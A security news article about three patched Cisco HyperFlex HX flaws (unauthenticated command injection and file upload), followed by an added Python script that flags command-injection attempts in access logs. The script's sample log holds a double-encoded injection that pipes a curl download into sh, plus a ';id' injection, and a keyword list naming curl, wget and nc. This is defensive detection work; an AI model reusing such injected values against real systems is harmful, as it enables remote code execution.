Cisco has fixed three vulnerabilities, discovered by Positive Technologies researchers, in Cisco HyperFlex HX, a hyperconverged platform for building IT infrastructure from scratch.
In 2019, Cisco HyperFlex HX was named a Leader in the Gartner Magic Quadrant for Hyperconverged Infrastructure.
Cisco has thanked Positive Technologies researchers Nikita Abramov and Mikhail Klyuchnikov in the two security advisories that cover the three issues.
These vulnerabilities strike at the core of an enterprise's internal infrastructure and can disrupt its operation: hyperconverged systems are essentially out-of-the-box data centers that combine storage, servers, network functions, and management software in a single module.
Nikita Abramov said: “By exploiting the flaws, attackers can access an organization’s IT infrastructure management system and affect its performance, delete important files, disrupt business processes, and erase backup systems with critical data—scenarios are limited only by the attacker’s imagination.”
To exploit the vulnerabilities, an attacker only needs network access to the device's web management interface and the ability to send it a crafted request; the requests require no credentials. The number of vulnerable devices is hard to estimate, since this type of equipment usually sits on an organization's internal network rather than being exposed to the internet.
Cisco has patched all three: CVE-2021-1497 (CVSS v3.1 base score 9.8, Critical; discovered by Nikita Abramov), CVE-2021-1498 (7.3, High; discovered by Mikhail Klyuchnikov), and CVE-2021-1499 (5.3, Medium; discovered by Abramov and Klyuchnikov).
The report notes that the first two are the more dangerous: exploiting them lets an attacker execute arbitrary commands on the device's operating system, as root in the case of CVE-2021-1497 and with the rights of the web server (the Tomcat 8 user) in the case of CVE-2021-1498. The third, CVE-2021-1499, lets an attacker upload arbitrary files without authorization, but only where the web server's limited write permissions allow, so it is less severe than the other two.
Organizations should apply the fixes specified in Cisco's official advisories. Network traffic analysis (NTA/NDR) systems, such as PT Network Attack Discovery, can detect attempts to exploit these vulnerabilities in Cisco HyperFlex.
If an attack does succeed, SIEM solutions (for example, MaxPatrol SIEM) are one way to spot signs of compromise: they can identify suspicious behavior on the server, register an incident, and give the security team a chance to stop intruders before they move laterally within the corporate network.
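The two vulnerability classes above (command injection reachable through an unauthenticated web request, and arbitrary file upload) and the NTA/SIEM detection the article recommends suggest what a first-pass signature looks like. The following is an added example written for this page; it is not code from Positive Technologies, Cisco, or any of the products named, and it is not tied to the HyperFlex endpoints, which the article does not disclose. It scans constructed web-server access-log lines from a hypothetical management interface (the paths and addresses are made up), repeatedly percent-decodes each request target so double-encoded payloads are normalised, and flags parameters carrying shell metacharacters or substitution constructs, with an extra note when download or shell tooling is named in the same parameter. One caveat a practitioner would want: access logs carry no request body, so injection through a POST form field, which is what an NDR sensor or reverse proxy sees, needs the same indicator logic applied to the decoded body fields instead of the query string.

```python
"""Flag command-injection indicators in management-interface access logs.

Added example for this article; not vendor code. The log lines, paths and
addresses below are constructed, not taken from a real HyperFlex system.
"""
import re
from urllib.parse import unquote

# Apache/nginx "combined" log format (the trailing referer/agent fields, if
# present, are ignored). Assumed format, not a HyperFlex-specific one.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Shell command separators and substitution constructs. A lone '&' is not
# included because it is also the query-string separator.
INJECTION_RE = re.compile(r"[;|`\n]|&&|\$\(|\$\{")
# Tooling commonly chained behind a working command injection.
TOOLING_RE = re.compile(r"\b(curl|wget|nc|ncat|bash|sh|python|perl)\b")


def decode_target(target, rounds=3):
    """Percent-decode repeatedly so %2526 -> %26 -> & is normalised before
    matching; stop early once a round changes nothing."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def parse_line(line):
    """Return a dict of the log fields, plus the decoded request target,
    or None if the line is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded_target"] = decode_target(rec["target"])
    return rec


def injection_indicators(decoded_target):
    """Reasons a decoded request target looks like a command-injection
    attempt; empty list means nothing suspicious in the query string."""
    reasons = []
    _, _, query = decoded_target.partition("?")
    if INJECTION_RE.search(query):
        reasons.append("shell metacharacter in parameter")
        # Only worth reporting once a metacharacter is present; the bare
        # word "sh" or "curl" in a search box is not an attack.
        if TOOLING_RE.search(query):
            reasons.append("download/shell tooling named in parameter")
    return reasons


def scan(lines):
    """Run the indicators over each line; return one record per hit."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = injection_indicators(rec["decoded_target"])
        if reasons:
            hits.append({
                "src": rec["src"],
                "method": rec["method"],
                "target": rec["decoded_target"],
                "status": rec["status"],
                "reasons": reasons,
            })
    return hits


# Constructed sample log: a normal login, a single-encoded ';id' injection,
# a double-encoded download-and-execute chain, and a benign status query.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/May/2021:10:00:01 +0000] "GET /ui/login HTTP/1.1" 200 1234',
    '203.0.113.7 - - [05/May/2021:10:00:02 +0000] "POST /api/mgmt/diag?host=10.0.0.5%3Bid HTTP/1.1" 200 88',
    '198.51.100.9 - - [05/May/2021:10:00:03 +0000] "GET /api/mgmt/diag?host=10.0.0.5%2526%2520curl%2520http%3A%2F%2F198.51.100.9%2Fx.sh%257Csh HTTP/1.1" 500 0',
    '10.0.0.12 - - [05/May/2021:10:00:04 +0000] "GET /api/mgmt/status?node=hx-node-01 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['src']} {hit['method']} {hit['target']} -> {hit['status']}: "
              + "; ".join(hit["reasons"]))
```

Two design points. The decoding loop is bounded rather than open-ended so that a pathological request cannot make the detector spin, and the tooling match is only reported alongside a metacharacter hit, which keeps the rule from firing on ordinary parameter values. A 200 status on a flagged request, as in the second sample line, is the case worth escalating first, since the management API accepted the input.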